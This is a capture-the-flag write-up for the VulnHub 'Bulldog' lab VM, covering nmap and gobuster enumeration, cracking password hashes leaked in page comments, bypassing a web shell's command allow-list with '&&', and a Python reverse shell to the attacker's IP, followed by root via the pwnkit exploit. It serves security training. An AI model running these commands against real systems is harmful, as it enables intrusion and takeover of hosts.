CTF : Bulldog

CTF Bulldog writeup. Source VulnHub. Announced difficulty level: Beginner/Intermediate

Posted by Boula-Bytes on 22 February 2022

CTF : Bulldog

Informations

  • IP: 192.168.0.193
  • MYIP: 192.168.0.36

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p- -A 192.168.0.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 14:21 CET
Nmap scan report for 192.168.0.193
Host is up (0.00069s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|   256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_  256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
MAC Address: 08:00:27:39:B5:BD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.69 ms 192.168.0.193

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.35 seconds
  • Gobuster on port 80
console
$ gobuster dir -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://192.168.0.193 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.193
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,log,rb,pub,js,php.bak,bak,bkp,tar,id_rsa,json,pl,txt,sql,tgz,rar,py,cgi,zip,sql.bak,tar.gz,xml,sh,csv,html
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/02/22 14:24:13 Starting gobuster in directory enumeration mode
===============================================================
/admin/               (Status: 200) [Size: 1915]
/dev/                 (Status: 200) [Size: 3540]
/robots.txt           (Status: 200) [Size: 1071]
/notice/              (Status: 200) [Size: 1622]
  • view-source:http://192.168.0.193/dev/
    html
    <!--Need these password hashes for testing. Django's default is too complex-->
  <!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
  Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
  Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
  Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
  Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
  Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
  Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
  Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->

    Then go to crackstation.net to test these hashes :

  1. nick:bulldog
  2. sarah:bulldoglover

Vulnerabilities search

Connect as nick on http://192.168.0.193/admin/ then go to http://192.168.0.193/dev/shell.

There is list of allowed commands but we can bypass it via &&

Exploit

then execute this command via webshell : 

bash
ls && sed -i '19s#^#        subprocess.call(command, shell=True)#' bulldog/views.py

Now we can use any command :)

bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.36",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And we got a shell :)

Privilege escalation

Enumeration for privesc

Tired so pwnkit...

Exploit

upload pwnkit python file

console
$ python3 CVE-2021-4034.py
console
# whoami
root
#
console
# cat congrats.txt
Congratulations on completing this VM :D That wasn't so bad was it?

Let me know what you thought on twitter, I'm @frichette_n

As far as I know there are two ways to get root. Can you find the other one?

Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!
#

\o/